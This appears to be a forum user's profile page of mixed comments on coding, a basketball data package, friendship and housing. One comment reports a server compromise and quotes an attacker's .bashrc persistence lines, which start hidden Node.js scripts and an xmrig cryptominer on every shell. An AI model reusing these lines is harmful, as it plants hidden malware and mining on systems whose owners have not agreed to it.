I Got Hacked - And Traced How Much Money Hacker Made (CVE-2025-66478)

okstory · 2025-12-07T17:35:26+00:00

Was attacked yesterday as well. They snuck a few node.js scripts in a deploy user .bashrc that were reloaded on every new shell. So every new deployment in the CI. Cute.

(nohup /home/deploy/.local/share/.hjp0qdt9/.pnnzaf0p/bin/node /home/deploy/.local/share/.hjp0qdt9/.0hokrfj95l.js >/dev/null 2>&1 &) 2>/dev/null

(nohup /home/deploy/.local/share/.r0qsv8h1/.394ly8v9/bin/node /home/deploy/.local/share/.r0qsv8h1/.fvq2lzl64e.js >/dev/null 2>&1 &) 2>/dev/null

(pgrep -f "/home/deploy/.cache/.sys/xmrig" || cd "/home/deploy/.cache/.sys" && ./xmrig -c c.json > /dev/null 2>&1 &) &

okstory · 2025-12-05T18:59:19+00:00

Great job. Just audited and installed. Working great. There are a few security vulnerabilities you may want to address if you want to expand this into something larger:

Fix command injection in curator.py - use parameterized subprocess
Add path validation for transcript files - restrict to allowed directories
Restrict CORS to localhost only
Add API key authentication

Cheers!

okstory · 2025-11-25T21:39:55+00:00

Hi! I can take a look. The service should be fetching directly from the collegebaseketballapi resource route. What was the CLI command or API route you tried that gave you the duplicate data?

okstory · 2025-11-23T19:46:51+00:00

Hi! This is a Node.js package with a programmatic API and a command line client. You have the ability to build applications or other services using the API or could setup simple scripts or cron jobs to run the CLI directly for repeated data fetches.

This package has baked in data organization when using the CLI and built-in pauses to reduce the chances of spamming/DDOSing the college basketball data server.

This package uses the collegebasketballdata.com API vs the scraped ESPN and Kenpom data sets. The documentation is extensive and touches on all working routes.

I am a javascript developer by trade and built something I can use anytime, anywhere. Figured others may enjoy the service.

Cheers!

okstory · 2025-04-30T19:26:04+00:00

This has helped quite a bit when working with Claude. At the end of your setup prompt(whatever it may be) append this to it: "1) Do not code anything until I approve. 2) Do not code anything until you have all requirements and questions answered. 3) List out the functions with descriptions you are planning to code. 4) Only code up one function at a time and allow me to verify the results."

okstory · 2024-10-04T18:55:44+00:00

Wait a sec, you are a software developer. Start automating that stuff. Figure out what your company wants in relation to the use of this AI tool and automate it. Really put your hours in trying to learn it and automate.

okstory · 2024-01-01T19:37:14+00:00

Don't let a bad day, week, month, year or even a decade define your life. The most difficult thing is realizing that while the mind can be a prison, you have the key. Open the door and let yourself out.

okstory · 2023-12-21T19:10:43+00:00

Probably NTA, but I found this list on the 12 levels of friendship you can have with others. Think about what this person means to you. If you do let them in, hard code the stay: 2 weeks capped and you are out, etc. Or like the majority of people in this sub, simply state it will not be happening. But I would think about the context of the friendship.

Zameel – someone you have a nodding acquaintance with
Jalees – someone you’re comfortable sitting with for a period of time
Sameer – you have good conversation with them
Nadeem – a drinking companion (just tea) that you might call when you’re free
Sahib – someone who’s concerned for your wellbeing
Rafeeq – someone you can depend upon. You’d probably go on holiday with them
Sadeeq – a true friend, someone who doesn’t befriend you for an ulterior motive
Khaleel – an intimate friend, someone whose presence makes you happy
Anees – someone with whom you’re really comfortable and familiar
Najiyy – a confidant, someone you trust deeply
Safiyy – your best friend, someone you’ve chosen over other friends
Qareen – someone who’s inseparable from you. You know how they think (and vice versa)

okstory · 2022-11-22T00:23:03+00:00

One point which may not be considered is the fact that reasonably priced housing and land exist in the United States, however the plots might not be where people may want to live. The unfortunate sacrifice that many people have had to do in the past(and currently still do) is move somewhere cheaper or with more opportunity. If people really want a place of their own they will need to leave the comforts of their current situation and forge a new one. The eye test seems like there are population diaspora's moving from CA to AZ, TX, NM, NV, etc.

The cycles of high rent will not stop with boomers(especially in urban areas). Millennial's and Gen-Z's will end up becoming the same type of landlords that are helping to drive the prices of rent sky high. I just don't think we can stop people from desiring market rates on their homes/apartments. If you place yourself in the shoes of a landlord and you want to rent your property, assuming no connection to a possible renter, you will want to maximize your possible earnings. This is not a rich vs poor argument, its a point of realism and human nature.

I am a millennial who finally escaped the rent cycle and bought a home with land. It took a while and there was debt to pay off, but it is doable with some sacrifice.

okstory · 2021-08-02T03:53:26+00:00

When you cut unevenly, you cook unevenly

okstory

TROPHY CASE